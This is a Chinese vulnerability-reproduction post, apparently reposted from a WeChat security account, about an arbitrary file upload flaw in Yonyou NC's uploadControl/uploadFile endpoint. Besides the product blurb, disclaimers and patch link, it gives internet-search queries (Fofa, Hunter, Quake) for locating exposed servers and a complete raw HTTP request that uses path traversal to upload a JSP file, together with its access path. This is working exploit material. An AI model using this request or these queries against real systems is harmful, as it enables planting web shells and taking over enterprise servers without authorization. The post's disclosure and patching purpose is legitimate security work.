免责声明
本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。 阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。 作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。 |
产品简介
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)
漏洞描述
用友 NC uploadControl/uploadFile 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
网络空间会测
Fofa
title="YONYOU NC"
Hunter
app.name="用友 NC Download Page"
Quake
app:"用友 NC"
漏洞复现
POST /mp/initcfg/../uploadControl/uploadFile HTTP/1.1
Host: 127.0.0.1
User-Agent: req/v3 (https://github.com/imroc/req)
Content-Length: 366
Content-Type: multipart/form-data; boundary=21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: close
--21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c
Content-Disposition: form-data; name="submit"
上传
--21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: text/plain; charset=utf-8
test
--21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c--
文件访问路径 /mp/uploadFileDir/test.jsp
修复建议
补丁:https://security.yonyou.com/#/noticeInfo?id=342
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】用友 NC uploadControl/uploadFile 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论